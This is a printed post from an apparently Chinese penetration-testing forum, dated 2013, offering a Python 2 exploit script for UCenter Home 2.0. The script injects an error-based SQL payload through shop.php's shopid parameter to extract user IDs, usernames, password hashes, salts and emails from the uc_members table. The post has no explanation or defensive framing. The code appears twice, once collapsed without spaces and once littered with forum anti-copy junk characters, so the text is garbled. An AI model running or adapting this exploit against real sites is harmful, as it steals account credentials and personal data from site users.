中国网络渗透测试联盟

标题: UCenter Home 2.0 EXP [打印本页]
作者: admin    时间: 2013-1-23 09:18
标题: UCenter Home 2.0 EXP
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
  c/ w" p, }3 h! b
7 H6 J0 ~4 R! j* m# D7 f8 d: g4 Z8 \* W
#!/usr/bin/env python  0 j2 \$ m9 B' @  w3 c
4 o. n# ?- f5 ?* U  f7 @
import sys  
2 d5 F* X, r, w, \import urllib2  # z1 M! U8 h& y
import re  4 e' h' Z9 C+ ?& P; C) q3 o

4 @9 R0 w# y6 [! T0 r. ydef info():  
( |: N3 |- \, T& ]    print 'From:http://www.exploit-db.com/exploits/14997/'
/ L0 q- H& k: V. T5 p4 V( Q: c    print 'http://www.hake.cc/Web_loudong/' % O/ ]1 C5 g9 J# p' Z( P# k
    print 'changed:qiaoy'  6 U0 J. P/ K$ E& `, w# Q) P
    print 'exp:'  
4 ?5 U  a) t5 w* J    print ' ./UCenter_Home_2.0.py site'  
+ ~2 F4 `( d5 y* @$ u" v4 O6 r! v & N* d5 z' \% \% Z6 ^$ {
def main():  6 U( W' w  ?$ z9 Y- S+ X
    if len(sys.argv) != 2:  ; [$ j7 ?/ |/ W) z. e
        info()  
! r1 E; ^2 {+ P8 N    else:  . O5 K% C+ }  U: W) \# `
        site = sys.argv[1]  
4 D7 d3 t* M" p/ p, R. e8 r; R. T        if site[0:7] == 'http://':  
4 U+ P7 \) }( x2 w' A# T            sitesite =site  
$ P9 T( H, a1 n: l* T        elif site[0:8] == 'https://':  8 B* I5 |3 G. M# T; e  m. Z
            sitesite = site  # R' n" I3 C* r- }& Q& C
        else:  
4 D6 l/ h& j4 M8 |: @1 {            site = 'http://'+site  + m( Q1 H6 E" @" |" K! J
        try:  / x; U9 Z- V2 E/ J3 k8 j1 w
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
- t: G! N0 M1 y            Value = urllib2.urlopen(url).read()  
. e" H* H0 v, U, f6 a7 |- r4 G8 q            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
# f; a+ r5 _! s" f. W8 c            hacked = Msg.split(':')  : E! b! l) E/ B% o( I, w3 x1 x7 Q/ U
            print 'Name:    '+hacked[1]  * u& s0 ~8 u7 O0 T% ~* y
            print 'Passwd:  '+hacked[2]  
7 f0 ^1 i9 ~$ W            print 'salt:    '+hacked[3]  
+ |3 j$ T; U$ M! N. A            print 'email:   '+hacked[4]  0 R! A8 R3 p3 |, E- I* o- V% `) g
        except:  
0 V- C; i/ S/ s" j            print 'Sorry,I can\'t work............'  
0 U+ x% ~) g6 V9 o2 ^$ b
* q& d3 p+ g7 t: Pif __name__ == '__main__':  
7 H# C/ o  D; Z3 E) g    main()



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2